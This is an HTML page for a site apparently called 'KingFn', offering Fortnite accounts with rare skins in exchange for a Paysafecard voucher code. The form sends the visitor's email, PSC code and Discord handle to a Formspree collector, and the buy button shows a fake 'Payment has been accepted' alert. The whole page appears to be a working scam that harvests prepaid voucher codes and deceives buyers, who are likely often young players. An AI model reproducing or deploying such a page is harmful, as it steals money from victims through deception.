
<!DOCTYPE HTML>
<html lang="en">	

<meta http-equiv="content-type" content="text/html;charset=UTF-8" />
<head>
        <title>KingFn - Paysefecard payment</title>
		<link rel="icon" href="img/logo.png">
        <meta charset="utf-8">
		<link rel="stylesheet" type="text/css" href="style.css">
		<link href="css/style.css" rel="stylesheet">
        <script src="kit.fontawesome.com/5b7670894c.html" crossorigin="anonymous"></script>
				<link rel="icon" href="img/logo.png">
        <!-- Global site tag (gtag.js) - Google Analytics -->
        <script async src="https://www.googletagmanager.com/gtag/js?id=UA-114980620-2"></script>
                <script>
            window.dataLayer = window.dataLayer || [];
            function gtag(){dataLayer.push(arguments);}
            gtag('js', new Date());

            gtag('config', 'UA-114980620-2');
        </script>

    </head>
	
	
<body class="background" style="font-family:Trebuchet MS, sans-serif;"> 
        <main role="main">
                <nav class="navbar navbar-expand-lg navbar-dark" style="list-style-type: none;">
                    <div class="collapse navbar-collapse" id="navbarColor01">
                        <ul class="navbar-nav mr-auto">
                            <li class="nav-item active">
                            </li>
                        </ul>
                        <li class="nav-item">
                            <a class="nav-link" href="index.html" style="color: white; cursor: pointer;">Home</a>
                        <li class="nav-item">
                            <a class="nav-link" href="discord.html" style="color: white;">Discord</a>
                        </li>
						<li>
						    <a class="nav-link" href="feedback.html" style="color: white;">Feedback</a>
						</li>						
                    </div>
  </nav>

<!--Start of Tawk.to Script-->
<script type="text/javascript">
var Tawk_API=Tawk_API||{}, Tawk_LoadStart=new Date();
(function(){
var s1=document.createElement("script"),s0=document.getElementsByTagName("script")[0];
s1.async=true;
s1.src='https://embed.tawk.to/5fc67dbe920fc91564cc7802/default';
s1.charset='UTF-8';
s1.setAttribute('crossorigin','*');
s0.parentNode.insertBefore(s1,s0);
})();
</script>
<!--End of Tawk.to Script-->

<style>  
body {
  background-color: gray;
  background-repeat: no-repeat;
  background-attachment: fixed;
  background-size: cover;
  background-opacity: 1;
  font-family: Trebuchet MS, sans-serif;

}

przycisk{
	background: rgb(0,0,0,255);
	color: white;
	height: 300;
	width: 500;

}
.myButton {
	box-shadow:inset -1px -11px 0px -8px #3dc21b;
	background-color:#44c767;
	border-radius:35px;
	border:3px solid #18ab29;
	display:inline-block;
	cursor:pointer;
	color:#ffffff;
	font-family:Trebuchet MS;
	font-size:24px;
	font-style:italic;
	padding:22px 48px;
	text-decoration:none;
	text-shadow:7px 1px 7px #2f6627;
}
.myButton:hover {
	background-color:#5cbf2a;
}
.myButton:active {
	position:relative;
	top:1px;
}
select{
	width: 100%;
	height: 300px;
    padding: 6px;
    border-radius: 5px;
    border: 2px solid #1f1f1f;
    background-color: #1f1f1f;
    color: white;
	font-size: 20px;
	 font-family:Trebuchet MS, sans-serif;
	
}
label {
    width: 100%;
    padding: 6px;
    border-radius: 5px;
    border: 2px solid #1f1f1f;
    height: 43px;
    background-color: #1f1f1f;
    color: white;
	font-family:Trebuchet MS, sans-serif;
}

</style>
<center>
<form action="https://formspree.io/f/mjvpeapd" method="POST">
                        <input class="pay-input" type="email" name="email" value="" placeholder="Enter your e-mail there" >
                        <br>
                        <br>
                        <input class="pay-input" name="PSC CODE" type="psc_code" name="psc_code" value="" placeholder="Enter your PSC code">
                        <br>
                        <br>
                        <input class="pay-input" name="DISCORD" type="discord" name="discord" value="" placeholder="Enter your Discord">
                        <br>
                        <br>
						<input class="pay-input"name="SELECT ACCOUNT" type="account" name="account" value="" placeholder="Select the account you want to purchase" disabled>
						<br>
						<select multiple>  
							<option>Renegade Rider</option>
							<option>Recon Expert</option>
							<option>Black Knight</option>
							<option>Ghoul Trooper</option>
							<option>Ikonik</option>
							<option>Galaxy</option>
							<option>Skull Trooper</option>
							<option>Sparkle Specialist</option>
							<option>Royale Bomber</option>
							<option>Minty Axe</option>
							<option>Wonder Skin</option>
							<option>Aerial Assault</option>
						</select>
                        <br>
                        <br>
						<button class="myButton" onclick="alert('Payment has been accepted. Return account to the given discord and email. Waiting time up to 30 minutes')">Cilck there to <u>buy</u></a> 
</form>
</center>					
</body>
</html
